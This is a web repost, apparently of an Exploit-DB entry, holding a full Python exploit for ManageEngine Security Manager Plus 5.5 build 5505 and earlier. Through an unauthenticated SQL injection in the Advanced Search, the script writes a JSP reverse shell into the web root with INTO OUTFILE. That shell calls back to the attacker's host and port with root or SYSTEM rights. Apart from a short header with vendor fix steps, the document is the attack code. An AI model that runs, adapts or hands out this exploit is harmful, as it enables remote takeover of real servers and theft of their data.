分享程序员开发的那些事...
更新时间:2022-09-16 13:54:46
http://www.exploit-db.com/exploits/22093/
|
#+--------------------------------------------------------------------------------------------------------------------------------+
|
#
Exploit Title : Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi (Win+Linux)
|
#
Date : 18-10-2012
|
#
Author : xistence (xistence<[AT]>0x90.nl)
|
#
Software link : http://www.manageengine.com/products/security-manager/81779457/ManageEngine_SecurityManager_Plus.exe (Win)
|
#
Software link : http://www.manageengine.com/products/security-manager/81779457/ManageEngine_SecurityManager_Plus.zip (Linux)
|
#
Vendor site : http://www.manageengine.com/
|
#
Version : 5.5 build 5505 and lower
|
#
Tested on : CentOS 5.x + Windows XP/2008
|
#
|
#
Vulnerability : The SQL injection is possible on the "Advanced Search", the input is not validated correctly. To make it even worse,
|
#
the search can be accessed without any authentication. Security Manager Plus also has to run as root or SYSTEM user,
|
#
which makes a remote shell with root/SYSTEM privileges possible....
|
#
|
#
Fix:
|
#
1. Go to SMP server system and stop SMP service.
|
#
2. Download the SMP_Vul_fix.zip file from : http://bonitas.zohocorp.com/4264259/scanfi/31May2012/SMP_Vul_fix.zip
|
#
3. Extract the downloaded file which contains four files : AdvPMServer.jar, AdvPMClient.jar, scanfi.jar and AdventNetPMUnixAgent.jar
|
#
3. Copy the extracted .jar files to <SMP-HOME>\lib directory (e.g., C:\AdventNet\SecurityManager\lib). [Overwrite the existing jar files and do not rename them]
|
#
4. Start the SMP service.
|
#+--------------------------------------------------------------------------------------------------------------------------------+
|
import urllib,
urllib2, cookielib
|
import sys
|
import random
|
if (len(sys.argv)
!= 5):
|
print ""
|
print "[*]
Security Manager Plus 5.5 build 5505 and lower Remote SYSTEM/root SQLi exploit (Windows+Linux) - xistence (xistence<[at]>0x90.nl) - 2012-05-29"
|
print ""
|
print "[*]
Usage: secman-sql.py <RHOST> <LHOST> <LPORT> <OS>"
|
print "[*]
I.e.: ./secman-sql.py www.linux.org 192.168.2.66 8888 linux"
|
print "[*]
I.e.: ./secman-sql.py www.microsoft.com 192.168.2.66 8888 win"
|
print "[*]"
|
print "[*]
RHOST = Remote Host which runs Security Manager Plus"
|
print "[*]
LHOST = IP address of local machine (machine where you run the exploit from"
|
print "[*]
LPORT = Port on the local machine where you will run NC on for our reverse shell"
|
print "[*]
OS = linux/win"
|
print ""
|
print ""
|
exit(0)
|
rhost = sys.argv[1]
|
lhost = sys.argv[2]
|
lport = sys.argv[3]
|
osys = sys.argv[4]
|
if osys == 'linux':
|
command = "/bin/bash"
|
elif osys == 'win':
|
command = "cmd.exe"
|
else:
|
print "Choose
a valid OS, linux/win"
|
exit()
|
|
filename = ''
|
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6):
|
filename+=i
|
filename +=".jsp"
|
output_path = "../../webapps/SecurityManager/%s" %filename
|
jsp = '''
<%@page import="java.lang.*"%>
|
<%@page
import="java.util.*"%>
|
<%@page
import="java.io.*"%>
|
<%@page
import="java.net.*"%>
|
<%
|
class
StreamConnector extends Thread
|
{
|
InputStream
is;
|
OutputStream
os;
|
StreamConnector(
InputStream is, OutputStream os )
|
{
|
this.is
= is;
|
this.os
= os;
|
}
|
public
void run()
|
{
|
BufferedReader
in = null;
|
BufferedWriter
out = null;
|
try
|
{
|
in
= new BufferedReader( new InputStreamReader( this.is ) );
|
out
= new BufferedWriter( new OutputStreamWriter( this.os ) );
|
char
buffer[] = new char[8192];
|
int
length;
|
while(
( length = in.read( buffer, 0, buffer.length ) ) > 0 )
|
{
|
out.write(
buffer, 0, length );
|
out.flush();
|
}
|
}
catch( Exception e ){}
|
try
|
{
|
if(
in != null )
|
in.close();
|
if(
out != null )
|
out.close();
|
}
catch( Exception e ){}
|
}
|
}
|
try
|
{
|
Socket
socket = new Socket( "''' + lhost +'''",
'''+lport+'''
);
|
Process
process = Runtime.getRuntime().exec( "'''+command+'''"
);
|
(
new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
|
(
new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
|
}
catch( Exception e ) {}
|
%>'''
|
jsp = jsp.replace("\n","")
|
jsp = jsp.replace("\t","")
|
payload = "1))
"
|
payload += 'UNION
SELECT 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 INTO OUTFILE "%s"' % (jsp.encode('hex'),output_path)
|
payload += "
FROM mysql.user WHERE 1=((1"
|
opener = urllib2.build_opener()
|
opener.addheaders.append(('Cookie','STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337;
2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;'))
|
post_params = urllib.urlencode({'ANDOR' : 'and', 'condition_1' : 'OpenPorts@PORT','operator_1' : 'IN', 'value_1' :
payload, 'COUNT' : '1'})
|
print "[*]
Sending evil payload"
|
resp = opener.open("http://%s:6262/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP" %rhost,
post_params)
|
print "[*]
Created Reverse JSP shell http://%s:6262/%s" % (rhost,filename)
|
resp = opener.open("http://%s:6262/%s" % (rhost,filename))
|
print "[*]
Check your shell on %s %s\n" % (lhost,lport)
|